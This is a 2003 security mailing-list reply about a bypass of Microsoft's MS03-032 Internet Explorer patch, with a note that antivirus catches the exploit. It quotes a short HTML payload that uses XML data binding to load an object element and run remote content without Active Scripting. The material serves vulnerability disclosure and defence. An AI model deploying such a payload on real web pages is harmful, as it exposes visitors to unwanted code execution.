Updated antivirus software should catch this exploit and prevent any application from being launched. We have McAfee VirusScan 7 Ent. which caught both exploit examples at http://greymagic.com/adv/gm001-ie/ Andrew Becker C.H. Mortgage, D.R. Horton Phoenix IT/MIS Department Phone: (866) 639-7305 Fax: (480) 607-5383 "GreyMagic Software" To: "NTBugtraq" <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>, "Bugtraq" <security@greymag <bugtraq@securityfocus.com>, <full-disclosure@lists.netsys.com>, ic.com> <vulnwatch@vulnwatch.org> cc: <http-equiv@excite.com>, "Microsoft Security Response Center" 09/08/03 07:52 AM <secure@microsoft.com>, (bcc: Andrew D Becker/Continental Homes) Subject: RE: BAD NEWS: Microsoft Security Bulletin MS03-032 >The patch for Drew's object data=funky.hta doesn't work: This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which explains the problem in detail. Microsoft again patches the object element in HTML, but it doesn't patch the dynamic version of that same element. >1. Disable Active Scripting This actually means that no scripting is needed at all in order to exploit this amazingly critical vulnerability: <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> <xml id="oExec"> <security> <exploit> <![CDATA[ <object data=x.asp></object> ]]> </exploit> </security> </xml> Ouch.
